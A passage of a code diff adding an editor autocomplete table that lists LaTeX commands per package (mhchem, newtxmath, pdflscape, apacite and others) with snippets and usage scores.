0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'mhchem-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'mhchem-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'mhchem-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'mhchem-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'mhchem-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'mhchem-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'mhchem-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'mhchem-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'mhchem-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'mhchem-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'mhchem-cmd', + score: 
0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'mhchem-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'mhchem-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'mhchem-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mhchem-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'mhchem-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'mhchem-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'mhchem-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'mhchem-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'mhchem-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'mhchem-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'mhchem-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'mhchem-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'mhchem-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'mhchem-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mhchem-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'mhchem-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'mhchem-cmd', + score: 0.0063276692758974925, + }, + ], + amscd: [ + { + caption: '\\tag{}', + snippet: '\\tag{$1}', + meta: 'amscd-cmd', + score: 0.00784357461002059, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'amscd-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'amscd-cmd', + score: 0.0063276692758974925, + }, + ], + 'unicode-math': [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'unicode-math-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'unicode-math-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'unicode-math-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'unicode-math-cmd', + score: 0.2864294797053033, + }, + ], + ifxetex: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', 
+ meta: 'ifxetex-cmd', + score: 0.00021116765384691477, + }, + ], + newtxmath: [ + { + caption: '\\int', + snippet: '\\int', + meta: 'newtxmath-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\sqrt{}', + snippet: '\\sqrt{$1}', + meta: 'newtxmath-cmd', + score: 0.20240160977404634, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'newtxmath-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\hbar', + snippet: '\\hbar', + meta: 'newtxmath-cmd', + score: 0.024733493787737763, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'newtxmath-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\surd', + snippet: '\\surd', + meta: 'newtxmath-cmd', + score: 0.002159694087964359, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'newtxmath-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'newtxmath-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'newtxmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'newtxmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\vdots', + snippet: '\\vdots', + meta: 'newtxmath-cmd', + score: 0.03669355896719803, + }, + { + caption: '\\ddots', + snippet: '\\ddots', + meta: 'newtxmath-cmd', + score: 0.010831382784078964, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'newtxmath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'newtxmath-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'newtxmath-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'newtxmath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'newtxmath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'newtxmath-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'newtxmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'newtxmath-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'newtxmath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'newtxmath-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'newtxmath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'newtxmath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'newtxmath-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'newtxmath-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'newtxmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'newtxmath-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'newtxmath-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'newtxmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'newtxmath-cmd', + score: 
0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'newtxmath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'newtxmath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'newtxmath-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'newtxmath-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'newtxmath-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'newtxmath-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'newtxmath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'newtxmath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'newtxmath-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'newtxmath-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'newtxmath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'newtxmath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'newtxmath-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'newtxmath-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'newtxmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'newtxmath-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'newtxmath-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'newtxmath-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'newtxmath-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'newtxmath-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'newtxmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'newtxmath-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'newtxmath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'newtxmath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'newtxmath-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'newtxmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'newtxmath-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'newtxmath-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'newtxmath-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'newtxmath-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 
'newtxmath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'newtxmath-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'newtxmath-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'newtxmath-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'newtxmath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'newtxmath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'newtxmath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'newtxmath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'newtxmath-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'newtxmath-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'newtxmath-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'newtxmath-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'newtxmath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'newtxmath-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'newtxmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'newtxmath-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'newtxmath-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'newtxmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'newtxmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'newtxmath-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'newtxmath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'newtxmath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'newtxmath-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'newtxmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'newtxmath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'newtxmath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'newtxmath-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'newtxmath-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'newtxmath-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'newtxmath-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'newtxmath-cmd', + score: 0.00047859486202980376, + }, + { + 
caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'newtxmath-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'newtxmath-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'newtxmath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'newtxmath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'newtxmath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'newtxmath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'newtxmath-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'newtxmath-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'newtxmath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'newtxmath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'newtxmath-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'newtxmath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'newtxmath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'newtxmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'newtxmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'newtxmath-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'newtxmath-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'newtxmath-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'newtxmath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'newtxmath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'newtxmath-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'newtxmath-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'newtxmath-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'newtxmath-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'newtxmath-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'newtxmath-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'newtxmath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'newtxmath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'newtxmath-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 
'newtxmath-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'newtxmath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'newtxmath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'newtxmath-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'newtxmath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'newtxmath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'newtxmath-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'newtxmath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'newtxmath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'newtxmath-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'newtxmath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'newtxmath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'newtxmath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'newtxmath-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'newtxmath-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'newtxmath-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'newtxmath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'newtxmath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'newtxmath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'newtxmath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'newtxmath-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'newtxmath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'newtxmath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'newtxmath-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'newtxmath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'newtxmath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'newtxmath-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'newtxmath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'newtxmath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'newtxmath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'newtxmath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'newtxmath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'newtxmath-cmd', + 
score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'newtxmath-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'newtxmath-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'newtxmath-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'newtxmath-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'newtxmath-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'newtxmath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'newtxmath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'newtxmath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'newtxmath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'newtxmath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'newtxmath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'newtxmath-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'newtxmath-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'newtxmath-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'newtxmath-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'newtxmath-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'newtxmath-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'newtxmath-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'newtxmath-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'newtxmath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'newtxmath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'newtxmath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'newtxmath-cmd', + score: 0.0063276692758974925, + }, + ], + pdflscape: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pdflscape-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'pdflscape-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pdflscape-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pdflscape-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pdflscape-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pdflscape-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pdflscape-cmd', + score: 0.0005981923692899367, + }, + { + caption: 
'\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pdflscape-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pdflscape-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pdflscape-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pdflscape-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pdflscape-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pdflscape-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pdflscape-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pdflscape-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pdflscape-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pdflscape-cmd', + score: 0.004649150613625593, + }, + ], + apacite: [ + { + caption: '\\citep{}', + snippet: '\\citep{$1}', + meta: 'apacite-cmd', + score: 0.2941882834697057, + }, + { + caption: '\\citet{}', + snippet: '\\citet{$1}', + meta: 'apacite-cmd', + score: 0.09046048561361801, + }, + { + caption: '\\url{}', + snippet: '\\url{$1}', + meta: 'apacite-cmd', + score: 0.13586474005868793, + }, + { + caption: '\\BPGS', + snippet: '\\BPGS', + meta: 'apacite-cmd', + score: 0.00023651453263545777, + }, + { + caption: 